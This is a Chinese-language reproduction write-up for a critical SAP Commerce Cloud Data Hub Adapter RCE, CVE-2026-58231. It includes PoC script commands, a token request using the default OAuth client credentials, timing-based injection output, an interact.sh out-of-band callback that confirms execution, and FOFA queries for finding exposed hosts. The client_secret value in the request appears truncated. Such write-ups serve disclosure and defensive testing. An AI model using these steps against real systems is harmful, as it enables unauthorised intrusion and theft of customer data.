漏洞简介
CVE-2026-58231 是 SAP Commerce Cloud 中的 Critical 级别代码注入漏洞,CVSS 评分 10.0(NVD)。该漏洞存在于 Data Hub Adapter 组件中,核心问题是系统内部使用默认身份验证客户端(client_id: trusted_client / secret)处理请求时,未对 /datahubadapter/import/** 端点实施充分的授权检查和输入验证,导致未经身份验证的攻击者可以提交精心构造的输入触发代码注入。
通过逆向分析漏洞利用链,攻击者只需向 Data Hub import 端点发送恶意 payload 即可执行以下操作:获取系统权限、窃取客户和订单数据、篡改商店配置、横向移动至后端 ERP 系统、完全接管 Commerce Cloud 实例。
该漏洞的影响链路:发现暴露的 SAP Commerce Cloud → 枚举默认 OAuth 客户端凭证 → 获取 Access Token → 向 /datahubadapter/import/** 端点发送恶意 payload → 触发代码注入实现 RCE → 渗透内部组件。
影响范围
漏洞复现
准备环境
步骤 1:产品检测(被动识别)
使用 PoC 脚本检测目标是否运行 SAP Commerce Cloud:
```bash
python3 poc.py -t http://TARGET_IP --version-only
```脚本将检测以下特征:
/authorizationserver/oauth/tokenOAuth 端点响应
/rest/v2REST API 端点响应
响应头中的
hybris、sap-commerce、ycommercewebservices标识
步骤 2:默认认证客户端爆破
PoC 脚本尝试使用已知默认 OAuth 客户端凭证获取 Access Token:
POST /authorizationserver/oauth/token HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
grant_type=client_credentials\&client_id=trusted_client\&client_secret=se
成功响应示例:
```json
{
"access_token": "eyJhbGciOiJSUzI1NiIs...",
"token_type": "Bearer",
"expires_in": 43200
}
```
步骤 3:完整漏洞检测
运行完整的漏洞检测脚本:
python3 poc.py -t http://TARGET_IP --check -v输出示例:
```
CVE-2026-58231 - SAP Commerce Cloud RCE Detection PoC
Target: http://TARGET_IP
Mode: Full active check
------------------------------------------------------------
[*] Stage 1: Detecting SAP Commerce Cloud...
[+] Product detected: SAP Commerce Cloud
[*] - OAuth token endpoint present (HTTP 400)
[*] - Body keyword 'Hybris' found at /rest/v2
[*] Stage 2: Detecting SAP Commerce Cloud version...
[+] Version: 2211.05 (POTENTIALLY VULNERABLE)
[*] Stage 3 [timing_based]: Testing for command injection via timing...
[*] Endpoint: http://TARGET_IP/rest/v2/electronics/users/anonymous/carts
[*] Baseline: 0.52s | Injection: 6.84s
[VULNERABLE]
Confidence: 85%
Evidence: Response delay of 6.84s detected (baseline: 0.52s)
```
步骤 4:OOB 回调验证(确认 RCE)
使用 Interact.sh 等 OOB 平台验证命令执行:
```bash
python3 poc.py -t http://TARGET_IP --check --callback https://abc.interact.sh -v
```
当 payload 触发时,Interact.sh 将收到 inbound 请求,确认 RCE:
```
[OOB PENDING]
Note: Check https://abc.interact.sh for inbound DNS/HTTP requests
```
FOFA 语法
body="hybris" && body="commerce"或精确匹配 Data Hub Adapter 端点:
body="/datahubadapter"